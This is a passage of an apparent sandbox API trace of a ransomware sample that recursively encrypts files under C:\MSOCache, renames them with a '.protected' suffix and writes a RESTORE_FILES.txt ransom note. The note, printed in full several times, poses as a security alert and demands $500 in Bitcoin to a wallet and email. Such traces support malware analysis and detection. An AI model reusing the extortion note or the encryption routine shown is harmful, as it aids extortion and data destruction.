lpSrch=".rar") returned 0x0 [0058.857] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0058.857] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0058.857] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x5ac, lpOverlapped=0x0) returned 1 [0058.876] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffa54, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.876] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x5ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x5ac, lpOverlapped=0x0) returned 1 [0058.876] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.876] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, 
lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0058.876] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.876] CloseHandle (hObject=0xb4) returned 1 [0058.876] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0058.876] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0058.877] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0058.877] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0058.877] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0058.877] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0058.878] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0058.878] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0058.878] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0058.878] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0058.878] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0058.878] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0058.878] CloseHandle (hObject=0xa4) returned 1 [0058.879] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0058.879] lstrcmpiW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0058.879] lstrcmpiW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0058.879] lstrcmpiW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0058.879] lstrcmpiW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", 
lpString2="$Recycle.bin") returned 1 [0058.879] lstrcmpiW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0058.879] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C") returned 66 [0058.879] lstrcmpW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0058.879] lstrcmpW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0058.879] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*") returned 68 [0058.879] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0058.888] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0058.888] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0058.888] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0058.888] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0058.888] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0058.888] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\.") returned 68 [0058.888] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.888] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0058.888] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0058.888] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.888] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, 
pdwDataLen=0x295f154*=0x30) returned 1 [0058.888] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.889] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.889] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0058.889] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0058.889] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0058.889] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0058.889] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0058.889] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\..") returned 69 [0058.889] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0058.889] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.889] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0058.889] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0058.889] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.889] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.889] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\.." 
(normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.889] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.889] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0058.889] lstrcmpiW (lpString1="1033", lpString2="Program Files") returned -1 [0058.889] lstrcmpiW (lpString1="1033", lpString2="Program Files (x86)") returned -1 [0058.889] lstrcmpiW (lpString1="1033", lpString2="$Recycle.bin") returned 1 [0058.889] lstrcmpiW (lpString1="1033", lpString2="System Volume Information") returned -1 [0058.889] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033") returned 71 [0058.889] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0058.889] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0058.889] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*") returned 73 [0058.889] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x4a9270 [0058.890] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0058.890] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0058.890] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0058.890] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0058.890] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0058.890] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\.") returned 73 [0058.890] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.890] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0058.890] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0058.890] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0058.890] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0058.890] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0058.890] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0058.890] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\..") returned 74 [0058.890] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0058.890] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.890] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0058.890] lstrcmpiW (lpString1="dwintl20.dll", lpString2="Windows") returned -1 [0058.890] lstrcmpiW (lpString1="dwintl20.dll", lpString2="Program Files") returned -1 [0058.890] lstrcmpiW (lpString1="dwintl20.dll", lpString2="Program Files (x86)") returned -1 [0058.890] lstrcmpiW (lpString1="dwintl20.dll", lpString2="$Recycle.bin") returned 1 [0058.890] lstrcmpiW (lpString1="dwintl20.dll", lpString2="System Volume Information") returned -1 [0058.890] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 84 [0058.890] StrStrIW (lpFirst="dwintl20.dll", lpSrch=".protected") returned 0x0 [0058.890] lstrcmpW (lpString1="dwintl20.dll", lpString2="RESTORE_FILES.txt") returned -1 [0058.890] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) 
returned 1 [0058.890] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x30) returned 1 [0058.890] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0058.891] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 84 [0058.891] StrStrW (lpFirst="dwintl20.dll", lpSrch=".txt") returned 0x0 [0058.891] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 84 [0058.891] StrStrW (lpFirst="dwintl20.dll", lpSrch=".rar") returned 0x0 [0058.891] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 84 [0058.891] StrStrW (lpFirst="dwintl20.dll", lpSrch=".zip") returned 0x0 [0058.891] ReadFile (in: hFile=0x150, lpBuffer=0x4acae0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0058.907] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.907] WriteFile (in: hFile=0x150, lpBuffer=0x4acae0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0058.907] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0x0) returned 1 [0058.907] WriteFile (in: hFile=0x150, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0058.927] WriteFile (in: hFile=0x150, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0058.928] CloseHandle (hObject=0x150) returned 1 [0058.928] wnsprintfW (in: pszDest=0x4acae0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.protected") returned 94 [0058.928] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll.protected")) returned 1 [0058.928] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0058.928] FindClose (in: hFindFile=0x4a9270 | out: hFindFile=0x4a9270) returned 1 [0058.928] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\RESTORE_FILES.txt") returned 89 [0058.928] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.929] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0058.929] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0058.929] lstrlenA (lpString="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") returned 684 [0058.929] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: 
lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0058.929] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0058.929] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0058.929] CloseHandle (hObject=0xb4) returned 1 [0058.930] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.930] lstrcmpiW (lpString1="branding.xml", lpString2="Windows") returned -1 [0058.930] lstrcmpiW (lpString1="branding.xml", lpString2="Program Files") returned -1 [0058.930] lstrcmpiW (lpString1="branding.xml", lpString2="Program Files (x86)") returned -1 [0058.930] lstrcmpiW (lpString1="branding.xml", lpString2="$Recycle.bin") returned 1 [0058.930] lstrcmpiW (lpString1="branding.xml", lpString2="System Volume Information") returned -1 [0058.930] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 79 [0058.930] StrStrIW (lpFirst="branding.xml", lpSrch=".protected") returned 0x0 [0058.930] lstrcmpW (lpString1="branding.xml", lpString2="RESTORE_FILES.txt") returned -1 [0058.930] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.930] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.930] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: 
"c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.933] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 79 [0058.933] StrStrW (lpFirst="branding.xml", lpSrch=".txt") returned 0x0 [0058.933] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 79 [0058.933] StrStrW (lpFirst="branding.xml", lpSrch=".rar") returned 0x0 [0058.933] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 79 [0058.933] StrStrW (lpFirst="branding.xml", lpSrch=".zip") returned 0x0 [0058.933] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.944] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.944] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.947] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.947] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0058.955] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, 
lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.956] CloseHandle (hObject=0xb4) returned 1 [0058.956] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.protected") returned 89 [0058.956] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.protected")) returned 1 [0058.956] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.956] lstrcmpiW (lpString1="DW20.EXE", lpString2="Windows") returned -1 [0058.956] lstrcmpiW (lpString1="DW20.EXE", lpString2="Program Files") returned -1 [0058.956] lstrcmpiW (lpString1="DW20.EXE", lpString2="Program Files (x86)") returned -1 [0058.956] lstrcmpiW (lpString1="DW20.EXE", lpString2="$Recycle.bin") returned 1 [0058.956] lstrcmpiW (lpString1="DW20.EXE", lpString2="System Volume Information") returned -1 [0058.956] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 75 [0058.956] StrStrIW (lpFirst="DW20.EXE", lpSrch=".protected") returned 0x0 [0058.956] lstrcmpW (lpString1="DW20.EXE", lpString2="RESTORE_FILES.txt") returned -1 